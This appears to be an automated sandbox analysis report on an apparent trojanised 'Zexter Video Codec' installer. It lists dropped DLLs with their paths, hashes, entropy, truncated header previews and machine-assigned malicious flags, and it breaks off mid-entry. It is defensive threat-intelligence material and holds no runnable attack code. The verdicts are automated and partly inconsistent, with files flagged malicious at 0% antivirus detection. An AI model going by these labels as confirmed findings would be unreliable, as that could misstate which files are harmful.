                                                                                                    SHA-512:2FFDB23615EE72DF600248D6B9DED0E25DAE12D8424557EC07589F34601C00421CF32A748CB564AFCED99B419805E43BF4D6D05EC33D581DBD03F9AF853005E8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........F......#.............................. f.......................................... ...................... ..u....0..<....`.......................p...............................P......................T1...............................text...D...........................`.P`.data...T...........................@.0..rdata..............................@.`@/4......TI.......J..................@.0@.bss..................................`..edata..u.... ......................@.0@.idata..<....0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165739
                                                                                                    Entropy (8bit):6.062324507479428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                                                    MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                                                    SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                                                    SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                                                    SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248781
                                                                                                    Entropy (8bit):6.474165596279956
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                                                    MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                                                    SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                                                    SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                                                    SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):706136
                                                                                                    Entropy (8bit):6.517672165992715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                                                    MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                                                    SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                                                    SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                                                    SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1222671
                                                                                                    Entropy (8bit):6.4094687832944235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:s2AYizbUVBV0u6ydQXUPIUJL0VGQRhORRajBbGN2JtYI3+0EIZy3fh6UtvR6YO3c:1AYhVBBsUJLORhH0QtYI33EuS1tvzO3c
                                                                                                    MD5:C12734BD4C4C33E788FE7FC6C1E47522
                                                                                                    SHA1:F474AB91C5DECD6D533C1DA016DC65800DBC5E9D
                                                                                                    SHA-256:9FFCD35CAEC4B199481620C82B8E2AFA9AE26F557D9A99C18B7DC23E61D59131
                                                                                                    SHA-512:AE948D3AB723144D2546F8B3401805CCFFBB312A14AD8D314685FB1EA85E74955F1372FEFE177571F518F51E66783B9813F876B93B35ED6E27C0E4743D59FA80
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z..(......#.........v....................|h.................................*........ ......................`.......0.......p...........................k...........................`......................d5..`............................text...X...........................`.P`.data...|...........................@.`..rdata...N.......P..................@.`@/4......l....0......................@.0@.bss.... ....@........................`..edata.......`......................@.0@.idata.......0... ..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc........p......................@.0..reloc...k.......l..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-UM70M.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2586624
                                                                                                    Entropy (8bit):6.983193418282665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:W7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:W7mpKgNdZRknYg3Fo8OqmUWz28g
                                                                                                    MD5:E6D179D3614AC88CFC80972DE4EBE2DC
                                                                                                    SHA1:8E05D76342CB0328921896C5901EBA9A2119ECFF
                                                                                                    SHA-256:2A92455631685D2F08DCFB4460A9A6B7452AB5911FE97992674D2980833D63E4
                                                                                                    SHA-512:E95BA2450924EEE8334FBB245C0DBB5F9C5BF117D0638A069EBB4A7E5AEE6E4448B45BB948B2074B23B8A95F4B71ED83C17BBFEC28EC8221FEDED3955F1B5DEB
                                                                                                    Malicious:false
                                                                                                    Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...`W.L..................".........(."......."...@...........................'......3(......................................."......p#..`............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8d....#..0....".............@....rsrc....b...p#..b....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):693931
                                                                                                    Entropy (8bit):6.506667977069754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:pgl0XdgCyZfZ1hTDy4ArwyP5Lt6fEWmOxU:u0NnYZ1hTDy44PTZOG
                                                                                                    MD5:37CE2C67DDCEE507833B9AE784AE515D
                                                                                                    SHA1:711B2AAE989D439CC816D198A3A4A7CDD6A070A3
                                                                                                    SHA-256:7A2BD595F34A25C13E94E4C2CDFB1758E9DE60FA7D497F5755BBBF906E82A0D7
                                                                                                    SHA-512:B8FB5A3D2CA99A661FB35F1C560A283070D28A1E438BF124632D4AD8D2EBE0869DF73F1AB8149DEA1FCA66B0285D28028DF83EF36AB27431ED26176EC2A21FCE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....Z...|...............p.....b.......................................... ......................p../.......(...............................t....................................................................................text....Y.......Z..................`.P`.data...L....p.......^..............@.0..rdata..x............`..............@.`@/4...........0...0..................@.0@.bss.........`........................`..edata../....p.......2..............@.0@.idata..(............J..............@.0..CRT....,............\..............@.0..tls.... ............^..............@.0..reloc..t........ ...`..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121524
                                                                                                    Entropy (8bit):6.347995296737745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                                                    MD5:6CE25FB0302F133CC244889C360A6541
                                                                                                    SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                                                    SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                                                    SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):814068
                                                                                                    Entropy (8bit):6.5113626552096
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                                                    MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                                                    SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                                                    SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                                                    SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):181527
                                                                                                    Entropy (8bit):6.362061002967905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                                                    MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                                                    SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                                                    SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                                                    SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):268404
                                                                                                    Entropy (8bit):6.265024248848175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                                                    MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                                                    SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                                                    SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                                                    SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1606715
                                                                                                    Entropy (8bit):6.432733703292802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:qi0l5PSkLHq6M30RmWXD4cE/TpXy4CEJQwAj7/RyYijPIDEFIgX3zdHyqFMa:eSqVMkRm3dyEYiGEFTdfFN
                                                                                                    MD5:34007E6F8E18D371DBFF19A279B008C3
                                                                                                    SHA1:58B091382EB981587CA6FDFAFC314E458598B8BB
                                                                                                    SHA-256:44D65416BB7EC0F43CE91927B33002CDF3E56038562F83E602C19A20C48AEB7D
                                                                                                    SHA-512:37F6338CDEA6220CF9079F25F760A2C7A50A01BD6A98C01798D20203F5A56FA0F37CDD7E91AE246C1077A34EC4FA42E9D2305ADA7CA8945E6591C8E26164C906
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#.............*................xm......................................... .........................9........z......`.......................<....................................................................................text...D...........................`.P`.data...............................@.`..rdata..4...........................@.`@/4......D...........................@.0@.bss.....)............................`..edata..9........ ...|..............@.0@.idata...z.......|..................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...`...........................@.0..reloc..<............ ..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1374336
                                                                                                    Entropy (8bit):6.544219940913283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:XxPyiEuJLPKpBW3n41iniSpKMFH/ZNYTujQb/XseSGwUCowrnDKHYHdT8s5ly8:B5XlHdxV
                                                                                                    MD5:86CE128833ECB1AC52EBED17993C1B56
                                                                                                    SHA1:C7FC8F88E908591CAAA9F25B954B06E814576158
                                                                                                    SHA-256:B22B57B0B6E0FD531CEA32CED338B9D12DD018D09D0B95CD61F166F64253B355
                                                                                                    SHA-512:1B8BEE2668599E33EA6F8121F7584431211512D6BCC8B409EAE162FBD6B505B0F4D0CD984AC8439C515BE4058A20270954D5DCBC62D16E95ED31A8225500F839
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........L......#.....0...................@.....k.................................W........ .........................I....P...................................}...................................................i...............................text..../.......0..................`.P`.data...<....@.......4..............@.@..rdata..,....P.......6..............@.`@/4.......@...@...B...&..............@.0@.bss..................................`..edata..I............h..............@.0@.idata.......P......................@.0..CRT....,....p.......&..............@.0..tls.... ............(..............@.0..reloc...}.......~...*..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1222671
                                                                                                    Entropy (8bit):6.4094687832944235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:s2AYizbUVBV0u6ydQXUPIUJL0VGQRhORRajBbGN2JtYI3+0EIZy3fh6UtvR6YO3c:1AYhVBBsUJLORhH0QtYI33EuS1tvzO3c
                                                                                                    MD5:C12734BD4C4C33E788FE7FC6C1E47522
                                                                                                    SHA1:F474AB91C5DECD6D533C1DA016DC65800DBC5E9D
                                                                                                    SHA-256:9FFCD35CAEC4B199481620C82B8E2AFA9AE26F557D9A99C18B7DC23E61D59131
                                                                                                    SHA-512:AE948D3AB723144D2546F8B3401805CCFFBB312A14AD8D314685FB1EA85E74955F1372FEFE177571F518F51E66783B9813F876B93B35ED6E27C0E4743D59FA80
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z..(......#.........v....................|h.................................*........ ......................`.......0.......p...........................k...........................`......................d5..`............................text...X...........................`.P`.data...|...........................@.`..rdata...N.......P..................@.`@/4......l....0......................@.0@.bss.... ....@........................`..edata.......`......................@.0@.idata.......0... ..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc........p......................@.0..reloc...k.......l..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):463112
                                                                                                    Entropy (8bit):6.363613724826455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                                    MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                                    SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                                    SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                                    SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26562
                                                                                                    Entropy (8bit):5.606958768500933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                                    MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                                    SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                                    SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                                    SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):337171
                                                                                                    Entropy (8bit):6.46334441651647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                                    MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                                    SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                                    SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                                    SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174543
                                                                                                    Entropy (8bit):6.3532700320638025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                                    MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                                    SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                                                    SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                                                    SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):235032
                                                                                                    Entropy (8bit):6.398850087061798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                                                    MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                                                    SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
